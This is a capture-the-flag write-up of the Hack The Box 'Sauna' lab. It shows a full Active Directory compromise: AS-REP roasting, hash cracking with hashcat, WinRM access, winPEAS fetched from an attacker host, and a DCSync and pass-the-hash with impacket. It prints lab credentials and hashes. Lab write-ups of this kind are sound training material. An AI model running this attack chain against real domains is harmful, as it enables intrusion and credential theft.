[HTB] Sauna Writeup
HTB Sauna write-up
TL;DR
Employee names exposed on the web page were converted into likely AD username formats. Using the generated username list, AS-REP Roasting was performed and the AS-REP hash for fsmith was obtained. The hash was cracked, recovering the password Thestrokes23, which allowed WinRM access as fsmith.
During local privilege escalation enumeration, AutoLogon credentials for svc_loanmgr were discovered. The svc_loanmgr account had domain replication privileges, allowing a DCSync attack. The Administrator NTLM hash was dumped using secretsdump.py, and Pass-the-Hash authentication through WinRM was used to obtain Domain Controller access.
1. Recon
Nmap scan result showed that the target was a Windows Active Directory Domain Controller. Several AD-related services were exposed, including DNS, Kerberos, LDAP, SMB, and WinRM.
port scan result 
2. Initial Access - AS-REP Roasting
The target web page exposed employee names.
1
http://10.129.95.180/about.html
The discovered names were saved into member.txt.
1
2
3
4
5
6
7
└─$ cat member.txt
Fergus Smith
Shaun Coins
Sophie Driver
Bowie Taylor
Hugo Bear
Steven Kerb
Since Active Directory environments commonly use predictable username conventions, the full names were converted into the first initial + last name format.
1
2
3
4
5
6
7
└─$ cat member_format.txt
fsmith
scoins
sdriver
btaylor
hbear
skerb
This username list was then used for AS-REP Roasting.
1
└─$ impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/ -dc-ip 10.129.95.180 -usersfile member_format.txt -outputfile asreproast.hash
The AS-REP hash for fsmith was successfully obtained.
The recovered hash was cracked using hashcat with the rockyou.txt wordlist.
1
└─$ hashcat -m 18200 -a 0 asreproast.hash /usr/share/wordlists/rockyou.txt
1
fsmith:Thestrokes23
The recovered credential was used to authenticate to the target through WinRM.
1
└─$ evil-winrm -i 10.129.95.180 -u 'fsmith' -p 'Thestrokes23'
3. Privilege Escalation - AutoLogon Credentials to DCSync
After initial access was obtained as fsmith, local privilege escalation enumeration was performed using winPEAS.
1
2
3
*Evil-WinRM* PS C:\Users\FSmith\Documents> Invoke-WebRequest -Uri http://10.10.14.55/winPEASx64.exe -OutFile C:\Users\FSmith\Documents\winPEASx64.exe
*Evil-WinRM* PS C:\Users\FSmith\Documents> .\winPEASx64.exe
winPEAS identified AutoLogon credentials stored on the system.
1
svc_loanmanager:Moneymakestheworldgoround!
The recovered credentials belonged to the svc_loanmgr domain account. 
BloodHound showed that the svc_loanmgr account had the following replication privileges over the domain object.
1
2
GetChanges
GetChangesAll
These privileges correspond to domain replication rights and allow the account to perform a DCSync attack.
Using the svc_loanmgr credentials, the NTDS secrets were dumped remotely with secretsdump.py.
1
└─$ impacket-secretsdump 'EGOTISTICAL-BANK.LOCAL/svc_loanmgr:Moneymakestheworldgoround!@10.129.95.180'
The Administrator NTLM hash was recovered from the dump.
1
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
The recovered NTLM hash was then used for Pass-the-Hash authentication through WinRM.
1
└─$ evil-winrm -i 10.129.95.180 -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e
